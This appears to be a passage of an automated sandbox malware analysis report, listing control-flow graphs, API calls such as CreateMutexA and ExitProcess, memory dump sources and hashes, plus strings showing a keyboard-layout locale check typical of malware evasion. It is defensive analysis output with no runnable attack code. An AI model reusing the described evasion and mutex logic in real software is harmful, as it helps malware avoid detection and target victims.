a183dd 14713->14696 14714->14713 14724 a1c88e 14714->14724 14717 a1825a 14716->14717 14731 a1d3c8 14717->14731 14719 a1830d 14719->14696 14719->14719 14721 a1875d std::future_error::future_error 14720->14721 14723 a18707 14720->14723 14721->14698 14722 a1c88e __cftof 4 API calls 14722->14723 14723->14721 14723->14722 14727 a1c733 14724->14727 14726 a1c8a6 14726->14713 14728 a1c743 14727->14728 14729 a1690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 14728->14729 14730 a1c748 __cftof 14728->14730 14729->14730 14730->14726 14733 a1d3ee 14731->14733 14743 a1d3d8 __cftof 14731->14743 14732 a1d485 14736 a1d4e4 14732->14736 14737 a1d4ae 14732->14737 14733->14732 14734 a1d48a 14733->14734 14733->14743 14744 a1cbdf 14734->14744 14761 a1cef8 14736->14761 14739 a1d4b3 14737->14739 14740 a1d4cc 14737->14740 14750 a1d23e 14739->14750 14757 a1d0e2 14740->14757 14743->14719 14745 a1cbf1 14744->14745 14746 a1690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 14745->14746 14747 a1cc05 14746->14747 14748 a1cef8 GetPEB ExitProcess GetPEB RtlAllocateHeap 14747->14748 14749 a1cc0d __alldvrm __cftof _strrchr 14747->14749 14748->14749 14749->14743 14752 a1d26c 14750->14752 14751 a1d2a5 14751->14743 14752->14751 14753 a1d2de 14752->14753 14755 a1d2b7 14752->14755 14754 a1cf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 14753->14754 14754->14751 14756 a1d16d GetPEB ExitProcess GetPEB RtlAllocateHeap 14755->14756 14756->14751 14758 a1d10f 14757->14758 14759 a1d14e 14758->14759 14760 a1d16d GetPEB ExitProcess GetPEB RtlAllocateHeap 14758->14760 14759->14743 14760->14759 14762 a1cf10 14761->14762 14763 a1cf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 14762->14763 14764 a1cf75 14762->14764 14763->14764 14764->14743
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32(?,?,00A1652A,?,?,?,?,?,00A17661), ref: 00A16567
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1709477652.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709465412.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709477652.0000000000A42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709522219.0000000000A49000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709534381.0000000000A4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709547687.0000000000A57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709627052.0000000000BAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709640534.0000000000BAD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709656758.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709656758.0000000000BD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709683764.0000000000BD6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709697024.0000000000BDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709713712.0000000000BEE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709725785.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709740538.0000000000C01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709752873.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709764488.0000000000C05000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709781128.0000000000C17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709798976.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709813508.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709826985.0000000000C3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709839358.0000000000C45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709850765.0000000000C46000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709863478.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709875979.0000000000C4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709888099.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709901380.0000000000C5D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709913085.0000000000C5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709924660.0000000000C5F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709937066.0000000000C66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709949904.0000000000C68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709962676.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709974452.0000000000C6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709986617.0000000000C70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710002067.0000000000C81000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710014381.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710014381.0000000000CAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710052072.0000000000CDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710064257.0000000000CDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710076874.0000000000CDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710089532.0000000000CE0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710103458.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710115733.0000000000CF0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ExitProcess
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 621844428-0
                                                                                                                                                                                                                                                                • Opcode ID: e53e654902ef6c7b43f9d95a1eda9aea8df1235901e9248f76cbd6dff409e8e8
                                                                                                                                                                                                                                                                • Instruction ID: 4f7a87ba73654fc7aa04915776b1e4cd6c6e2928802391624ba53df3d3dca56c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e53e654902ef6c7b43f9d95a1eda9aea8df1235901e9248f76cbd6dff409e8e8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 09E0C230041208AFCF35BB18C919FC83B6BEF51769F104804FC188A222CB36EEC2D680
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1712030360.0000000004CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_4cc0000_file.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: f0cda6f524bd688a147fe6da429f00404864a8fe8f97482aab67e9f3b7488679
                                                                                                                                                                                                                                                                • Instruction ID: 7991d230d4c62103ad636d39ade10fc00e5e4adeebe29b728238c7118dafff26
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f0cda6f524bd688a147fe6da429f00404864a8fe8f97482aab67e9f3b7488679
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B3E0E5A324C120AD714290C32B605BA675FF4C7332334C03BF443C1542E4895A09B1B2

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1709477652.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709465412.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709477652.0000000000A42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709522219.0000000000A49000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709534381.0000000000A4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709547687.0000000000A57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709627052.0000000000BAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709640534.0000000000BAD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709656758.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709656758.0000000000BD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709683764.0000000000BD6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709697024.0000000000BDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709713712.0000000000BEE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709725785.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709740538.0000000000C01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709752873.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709764488.0000000000C05000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709781128.0000000000C17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709798976.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709813508.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709826985.0000000000C3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709839358.0000000000C45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709850765.0000000000C46000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709863478.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709875979.0000000000C4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709888099.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709901380.0000000000C5D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709913085.0000000000C5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709924660.0000000000C5F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709937066.0000000000C66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709949904.0000000000C68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709962676.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709974452.0000000000C6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709986617.0000000000C70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710002067.0000000000C81000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710014381.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710014381.0000000000CAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710052072.0000000000CDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710064257.0000000000CDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710076874.0000000000CDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710089532.0000000000CE0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710103458.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710115733.0000000000CF0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                                                                                                                                                                                                                                                • API String ID: 0-3963862150
                                                                                                                                                                                                                                                                • Opcode ID: 58e0705806dd2e6b65ea3d31aa8ec3da9ea2a7bebb72927208bb742981bcc574
                                                                                                                                                                                                                                                                • Instruction ID: 3f55930cec7ccb1fe8290ddfb758e41794cc0f51ee0c990988c7e5bc459072f8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 58e0705806dd2e6b65ea3d31aa8ec3da9ea2a7bebb72927208bb742981bcc574
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82F1D17090025CABEB24DF58CD84BEEBBB9EB45304F5046A8F508A72C1DB759E84CF94

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 185 9e9ba5-9e9d91 call 9f7a00 call 9e5c10 call 9e8b30 call 9f8220
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 009EA963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00A43254), ref: 009EA981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1709477652.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709465412.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709477652.0000000000A42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709522219.0000000000A49000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709534381.0000000000A4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709547687.0000000000A57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709627052.0000000000BAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709640534.0000000000BAD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709656758.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709656758.0000000000BD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709683764.0000000000BD6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709697024.0000000000BDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709713712.0000000000BEE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709725785.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709740538.0000000000C01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709752873.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709764488.0000000000C05000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709781128.0000000000C17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709798976.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709813508.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709826985.0000000000C3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709839358.0000000000C45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709850765.0000000000C46000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709863478.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709875979.0000000000C4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709888099.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709901380.0000000000C5D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709913085.0000000000C5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709924660.0000000000C5F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709937066.0000000000C66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709949904.0000000000C68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709962676.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709974452.0000000000C6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709986617.0000000000C70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710002067.0000000000C81000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710014381.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710014381.0000000000CAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710052072.0000000000CDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710064257.0000000000CDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710076874.0000000000CDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710089532.0000000000CE0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710103458.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710115733.0000000000CF0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                • Opcode ID: ccc3000e379e0eafb78c11698feddefe513401712e89b88f8b8281dabb7483f7
                                                                                                                                                                                                                                                                • Instruction ID: b3a2920e90fca3703723805a98eae5b32f54f2a556bbbb528a67a78a73956667
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ccc3000e379e0eafb78c11698feddefe513401712e89b88f8b8281dabb7483f7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 17316D317002449BEB09EB79DC897ADBB66EFD2314F344218E414D73E6D7765E808751

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 207 9e9f44-9e9f64 211 9e9f66-9e9f72 207->211 212 9e9f92-9e9fae 207->212 213 9e9f88-9e9f8f call 9fd663 211->213 214 9e9f74-9e9f82 211->214 215 9e9fdc-9e9ffb 212->215 216 9e9fb0-9e9fbc 212->216 213->212 214->213 217 9ea92b 214->217 221 9e9ffd-9ea009 215->221 222 9ea029-9ea916 call 9f80c0 215->222 219 9e9fbe-9e9fcc 216->219 220 9e9fd2-9e9fd9 call 9fd663 216->220 226 9ea953-9ea994 Sleep CreateMutexA 217->226 227 9ea92b call a16c6a 217->227 219->217 219->220 220->215 223 9ea01f-9ea026 call 9fd663 221->223 224 9ea00b-9ea019 221->224 223->222 224->217 224->223 237 9ea996-9ea998 226->237 238 9ea9a7-9ea9a8 226->238 227->226 237->238 239 9ea99a-9ea9a5 237->239 239->238
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 009EA963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00A43254), ref: 009EA981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1709477652.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709465412.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709477652.0000000000A42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709522219.0000000000A49000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709534381.0000000000A4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709547687.0000000000A57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709627052.0000000000BAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709640534.0000000000BAD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709656758.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709656758.0000000000BD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709683764.0000000000BD6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709697024.0000000000BDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709713712.0000000000BEE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709725785.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709740538.0000000000C01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709752873.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709764488.0000000000C05000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709781128.0000000000C17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709798976.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709813508.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709826985.0000000000C3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709839358.0000000000C45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709850765.0000000000C46000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709863478.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709875979.0000000000C4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709888099.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709901380.0000000000C5D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709913085.0000000000C5E000.00000040.00000001.01000000.00000003.sdmpDownload File
